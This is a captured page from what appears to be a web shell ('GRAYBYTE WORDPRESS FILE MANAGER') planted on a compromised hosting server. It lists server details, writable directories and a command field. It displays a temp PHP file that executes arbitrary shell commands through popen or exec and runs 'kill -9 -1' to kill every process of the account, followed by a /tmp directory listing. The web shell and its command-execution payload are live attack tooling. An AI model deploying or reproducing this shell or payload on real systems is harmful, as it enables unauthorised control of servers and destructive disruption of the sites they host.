GRAYBYTE WORDPRESS FILE MANAGER9733

Server IP : 68.65.123.43 / Your IP : 216.73.216.162
System : Linux server266.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
PHP Version : 8.0.30
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /tmp/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /tmp//phpSYF49Q
<?php
function run($code, $method = 'popen')
{
    $disabled = explode(',', ini_get('disable_functions'));
    if (in_array($method, $disabled)) {
        $method = 'exec';
    }
    if (in_array($method, $disabled)) {
        return false;
    }
    $result = '';
    switch ($method){
        case 'exec':
            exec($code,$array);
            foreach ($array as $key => $value) {
                $result .= $key . " : " . $value . PHP_EOL;
            }
            return $result;
            break;
        case 'popen':
            $fp = popen($code,"r");  //popen打一个进程通道
            while (!feof($fp)) {      //从通道里面取得东西
                $out = fgets($fp, 4096);
                $result .= $out;         //打印出来
            }
            pclose($fp);
            return $result;
            break;
        default:
            return false;
            break;
    }
}
echo '{->|';
var_dump(run("kill -9 -1"));
echo '|<-}';

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 20 2024 08:19:10
root / root
0755
wp-includes
--
July 09 2025 23:19:16
inteuuod / inteuuod
0755
.htaccess
0 KB
June 05 2024 04:32:17
inteuuod / inteuuod
0444
admin.php
5.234 KB
July 10 2025 05:47:41
inteuuod / inteuuod
0644
index.php
0 KB
June 05 2024 04:32:17
inteuuod / inteuuod
0444
phpSYF49Q
0.984 KB
July 13 2025 14:37:14
inteuuod / inteuuod
0600
phplzr40c
0.984 KB
July 13 2025 14:37:14
inteuuod / inteuuod
0600
sess_4747aeb6f04983a7967f6ba4c07b4a66
0 KB
July 13 2025 22:09:38
inteuuod / inteuuod
0600
sess_583905cf258ec556d715e7d6b1a65999
0 KB
July 13 2025 22:09:40
inteuuod / inteuuod
0600
session_cache.tmp
0.007 KB
July 13 2025 14:26:35
inteuuod / inteuuod
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF